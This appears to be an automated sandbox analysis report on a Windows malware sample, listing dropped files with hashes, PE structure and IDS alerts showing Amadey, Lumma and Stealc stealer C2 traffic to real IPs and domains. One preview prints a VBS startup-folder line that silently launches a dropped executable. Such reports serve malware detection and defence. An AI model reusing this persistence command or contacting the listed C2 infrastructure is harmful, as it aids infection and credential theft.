C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	87
Entropy (8bit):	4.863366737198591
Encrypted:	false
SSDEEP:	3:FER/n0eFHHo0nacwRE2J5xAIcLJHn:FER/lFHIcNwi23fO
MD5:	82890C9086653132221FD8165D9145D3
SHA1:	1E0568647409BE0DE6E1C750D0136B6BB3A5566C
SHA-256:	2D9C336022A1243405D92908A5336CF86F76811E31439E76C6F579397C218CDF
SHA-512:	DEDB02BC90E7374065E63279D7BD3F4362E16A8C41E7059ED528EE836704F37BCD137C14FE2DA846D980013D778E73CED3840FEDBB489A9015082218AE36F882
Malicious:	true
Reputation:	unknown
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Local\Temp\vmwin.exe"""

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9679
Entropy (8bit):	5.511111723777415
Encrypted:	false
SSDEEP:	192:lLnSRkGYbBp6OqUCaXr6VqkHNBw823nSl:geRqUWJPwx0
MD5:	A884AB3D49A239660EEE54CF27D5F33F
SHA1:	963064764E6AC791B0C8F74BF365305E1EA5ABEE
SHA-256:	2456D3E2A4D3215FFFA6ACC409E1C6A402A29C991E51A1B6BD383A143C17E50B
SHA-512:	F0CE5D62A435BEC184399CAF579D0511CB41659857355133EB2523EC700E3DA17306A9098C6D8F9850060EA48D55BB251024EB569816A8D266EB52972B793183
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9679
Entropy (8bit):	5.511111723777415
Encrypted:	false
SSDEEP:	192:lLnSRkGYbBp6OqUCaXr6VqkHNBw823nSl:geRqUWJPwx0
MD5:	A884AB3D49A239660EEE54CF27D5F33F
SHA1:	963064764E6AC791B0C8F74BF365305E1EA5ABEE
SHA-256:	2456D3E2A4D3215FFFA6ACC409E1C6A402A29C991E51A1B6BD383A143C17E50B
SHA-512:	F0CE5D62A435BEC184399CAF579D0511CB41659857355133EB2523EC700E3DA17306A9098C6D8F9850060EA48D55BB251024EB569816A8D266EB52972B793183
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Reputation:	unknown
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\Desktop\Cleaner.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 13 18:43:36 2024, mtime=Fri Dec 13 18:43:36 2024, atime=Fri Dec 13 18:43:36 2024, length=1502720, window=hide
Category:	modified
Size (bytes):	2215
Entropy (8bit):	3.9876860488514545
Encrypted:	false
SSDEEP:	48:8P452rGRy2ErcS77lY9vNm2cSOu2cS+Zsu2cS4f9fmyg:8gkreyBXfl6NlOdHdBy
MD5:	4A54418B8CCD5448C7C5D41635F78CA5
SHA1:	A565DFAC0C8E33AD670425769744DD9F3CDD300D
SHA-256:	A47C1792FA2580965487D7901E22B97D4F8528AB72F71DC00FA51010858FAF62
SHA-512:	402581125EA559A77209F3F64E76CBF7DA0828400CEC61CCE01F2574EAC617FB3226EE1507270EBCB48ECABB708B1559AFBE313E193E81AC257D34BEC8B4C06F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...G..M.M..G..M.M..G..M.M..........................>.:..DG..Yr?.D..U..k0.&...&......Qg._.......M..\j.M.M......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.YA...........................3*N.A.p.p.D.a.t.a...B.P.1......Y....Local.<......EW.=.YA.............................L.o.c.a.l.....N.1......Yr...Temp..:......EW.=.Ys...........................\y..T.e.m.p.....z.1......Ym...WWGF52~1..b......Ym..Ym......N........................w.w.G.F.5.2.Z.w.e.w.E.f.8.f.w.f.9.S.3.w.w.V.e.D.....h.2......Ys. .Y-CLEA~1.EXE..L......Ys..Ys......N........................Y.-.C.l.e.a.n.e.r...e.x.e.......{...............-.......z..............X.....C:\Users\user\AppData\Local\Temp\wwGF52ZwewEf8fwf9S3wwVeD\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.<.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.w.G.F.5.2.Z.w.e.w.E.f.8.f.w.f.9.S.3.w.w.V.e.D.\.Y.-.C.l.e.a.n.e.r...e.x.e.K.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l

C:\Windows\Tasks\Gxtuum.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe
File Type:	data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	3.5003534340574554
Encrypted:	false
SSDEEP:	6:pjlqDZXUKJUEZ+lX1RzkbtcVAkXIEZ8MlW8+y0lZtsEt0:pj4lvJQ1RzkXkXd8kX+VZtNt0
MD5:	BC2DF978DEA7F5E8AEEA12C5940D47E2
SHA1:	65F21D0FE1D79DBA1634CB56126AB246CD5184D9
SHA-256:	3A46C31091DAECDF64D2E6EC67250089ECFC298008737F63437F5E786988BE9F
SHA-512:	AA91F21F79C6F06BEE2712ED3B1C39CB9C8CE03441966CB8D6059FA5A2F6D13C40208DCAB802C5A0883F3D8258389D324314A925B86A6C3BA38598B1F215B61A
Malicious:	false
Reputation:	unknown
Preview:	....>eG4..8@.Cw..!9F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.7.7.2.5.c.e.6.8.8.f.\.G.x.t.u.u.m...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0...................@3P.........................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	3.460272837631018
Encrypted:	false
SSDEEP:	6:ZlvHt/DZXUKJUEZ+lX1CGdKUe6tcVAkXIEZ8MlW8+y0lZtct0:ZlVrlvJQ1CGAFMkXd8kX+VZtct0
MD5:	8F8F661F84243192B4FE02FE288BE861
SHA1:	616D7E7FB095FD8DDCF8288D0787FF039B2D6042
SHA-256:	3CAF2F7FF7521B0C2C1096F3F60A4F34986192564C74F807F72A86A3556C67CE
SHA-512:	82C4F0D3311DA2DDD99A82E4C35870C8211831571915B8DBDF6E97712BD889D6C6DCE40697D3B70938FA5380C4582EEA8260E449C2AE63F23EFF450E5B72492D
Malicious:	false
Reputation:	unknown
Preview:	....:...0FC.._...+.F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.................5.@3P.........................

unknown (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	9679
Entropy (8bit):	5.511111723777415
Encrypted:	false
SSDEEP:	192:lLnSRkGYbBp6OqUCaXr6VqkHNBw823nSl:geRqUWJPwx0
MD5:	A884AB3D49A239660EEE54CF27D5F33F
SHA1:	963064764E6AC791B0C8F74BF365305E1EA5ABEE
SHA-256:	2456D3E2A4D3215FFFA6ACC409E1C6A402A29C991E51A1B6BD383A143C17E50B
SHA-512:	F0CE5D62A435BEC184399CAF579D0511CB41659857355133EB2523EC700E3DA17306A9098C6D8F9850060EA48D55BB251024EB569816A8D266EB52972B793183
Malicious:	false
Reputation:	unknown
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.660733360087353
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'292'160 bytes
MD5:	f401f240c068bac2c47c4beb9446d2a0
SHA1:	2e659821c32f600fe2715814e5d96ff0eac09eb4
SHA256:	3ca467dad80a62f640093dcf65b29e413820c24288e3ac5dbfb4ca7639dd55d4
SHA512:	aa400b23501496f81ae5e695ddc2ebf261750696ca141a884f783563138c0dbded303f3d095ebb9a2b1f458ef3c1facafb15729bb5353a8500c7e932e94dd608
SSDEEP:	49152:DcKkpLBKiQ85dPY67Y3YwboNMxkaWNWtJ5jYh/:DcKkpLwhgdP4BMNMxkaWNWtJdY5
TLSH:	D1E54AE2640862CBD4CF56F49C1FDD86A95D02FDCB2848D3A86CB07A6E63CD135B5D28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x724000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FDD54BE39DAh
hint_nop dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x448	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x322a44	0x10	isvciprd
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x3229f4	0x18	isvciprd
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	afc9eb4d1bfe6b29d42140bd3ddce34b	False	0.5580890362079327	data	7.044916136043747	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x448	0x600	23f61aeefa7c3d30c07a21aa8f45e969	False	0.3053385416666667	data	5.28505835027857	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
isvciprd	0x6b000	0x2b8000	0x2b7c00	3c66ed5b5c824a4ebdaf6441e3900303	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bfywzfjw	0x323000	0x1000	0x600	33328df873804f0a672cab242731f1c7	False	0.5677083333333334	data	4.983883507560401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x324000	0x3000	0x2200	aa4b4d5601dea0a4e5aa021d9d89d434	False	0.06916360294117647	DOS executable (COM)	0.8593542404860964	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69070	0x256	ASCII text, with CRLF line terminators			0.5100334448160535
RT_MANIFEST	0x692c8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T18:53:18.000324+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.7	49835	185.215.113.43	80	TCP
2024-12-13T18:53:22.516393+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49847	45.11.183.55	80	TCP
2024-12-13T18:53:27.032871+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.7	49841	TCP
2024-12-13T18:53:28.384672+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49859	185.215.113.43	80	TCP
2024-12-13T18:53:29.835099+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49864	31.41.244.11	80	TCP
2024-12-13T18:53:35.698466+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49876	185.215.113.43	80	TCP
2024-12-13T18:53:37.158606+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49877	31.41.244.11	80	TCP
2024-12-13T18:53:40.722833+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49887	104.21.79.7	443	TCP
2024-12-13T18:53:41.933769+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49890	185.215.113.43	80	TCP
2024-12-13T18:53:42.281993+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49887	104.21.79.7	443	TCP
2024-12-13T18:53:42.281993+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49887	104.21.79.7	443	TCP
2024-12-13T18:53:42.299357+0100	2057945	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.7	59797	1.1.1.1	53	UDP
2024-12-13T18:53:42.299357+0100	2057983	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)	1	192.168.2.7	59797	1.1.1.1	53	UDP
2024-12-13T18:53:42.522029+0100	2057949	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.7	49908	1.1.1.1	53	UDP
2024-12-13T18:53:42.522029+0100	2057981	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)	1	192.168.2.7	49908	1.1.1.1	53	UDP
2024-12-13T18:53:42.750677+0100	2057929	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.7	62055	1.1.1.1	53	UDP
2024-12-13T18:53:42.750677+0100	2057979	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)	1	192.168.2.7	62055	1.1.1.1	53	UDP
2024-12-13T18:53:42.966487+0100	2057931	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.7	58590	1.1.1.1	53	UDP
2024-12-13T18:53:42.966487+0100	2057977	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)	1	192.168.2.7	58590	1.1.1.1	53	UDP
2024-12-13T18:53:43.209697+0100	2057925	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.7	52838	1.1.1.1	53	UDP
2024-12-13T18:53:43.209697+0100	2057973	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)	1	192.168.2.7	52838	1.1.1.1	53	UDP
2024-12-13T18:53:43.379907+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49895	31.41.244.11	80	TCP
2024-12-13T18:53:43.439391+0100	2057927	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.7	52701	1.1.1.1	53	UDP
2024-12-13T18:53:43.439391+0100	2057975	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz)	1	192.168.2.7	52701	1.1.1.1	53	UDP
2024-12-13T18:53:43.666184+0100	2057943	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.7	52464	1.1.1.1	53	UDP
2024-12-13T18:53:43.666184+0100	2057971	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz)	1	192.168.2.7	52464	1.1.1.1	53	UDP
2024-12-13T18:53:43.904931+0100	2057935	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.7	61907	1.1.1.1	53	UDP
2024-12-13T18:53:43.904931+0100	2057969	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz)	1	192.168.2.7	61907	1.1.1.1	53	UDP
2024-12-13T18:53:46.009812+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49902	23.55.153.106	443	TCP
2024-12-13T18:53:46.862358+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.7	49902	23.55.153.106	443	TCP
2024-12-13T18:53:50.584093+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49915	185.215.113.43	80	TCP
2024-12-13T18:53:52.164476+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49917	31.41.244.11	80	TCP
2024-12-13T18:53:54.411840+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.10.31	443	192.168.2.7	49922	TCP
2024-12-13T18:53:56.850746+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.7	49928	116.203.10.31	443	TCP
2024-12-13T18:53:56.851290+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.10.31	443	192.168.2.7	49928	TCP
2024-12-13T18:54:00.591637+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49942	185.215.113.43	80	TCP
2024-12-13T18:54:02.056661+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49944	185.215.113.16	80	TCP
2024-12-13T18:54:07.909956+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49968	185.215.113.43	80	TCP
2024-12-13T18:54:09.395844+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49977	185.215.113.16	80	TCP
2024-12-13T18:54:18.752301+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	50000	185.215.113.43	80	TCP
2024-12-13T18:54:20.225636+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50005	185.215.113.16	80	TCP
2024-12-13T18:54:25.176335+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.7	50011	89.35.131.209	80	TCP
2024-12-13T18:54:25.791250+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	50018	185.215.113.206	80	TCP
2024-12-13T18:54:26.317127+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.7	50018	185.215.113.206	80	TCP
2024-12-13T18:54:26.442670+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.7	50018	TCP
2024-12-13T18:54:26.781270+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.7	50018	185.215.113.206	80	TCP
2024-12-13T18:54:26.925386+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.7	50018	TCP
2024-12-13T18:54:28.087763+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50025	45.155.249.199	80	TCP
2024-12-13T18:54:28.326862+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.7	50018	185.215.113.206	80	TCP
2024-12-13T18:54:29.222706+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.7	50018	185.215.113.206	80	TCP
2024-12-13T18:54:29.343788+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	50029	185.215.113.43	80	TCP
2024-12-13T18:54:30.822572+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	50035	31.41.244.11	80	TCP
2024-12-13T18:54:33.093606+0100	2008438	ET MALWARE Possible Windows executable sent when remote host claims to send a Text File	1	45.155.249.199	80	192.168.2.7	50025	TCP
2024-12-13T18:54:40.467751+0100	2058159	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)	1	192.168.2.7	63259	1.1.1.1	53	UDP
2024-12-13T18:54:42.038292+0100	2058160	ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)	1	192.168.2.7	50041	104.21.35.43	443	TCP
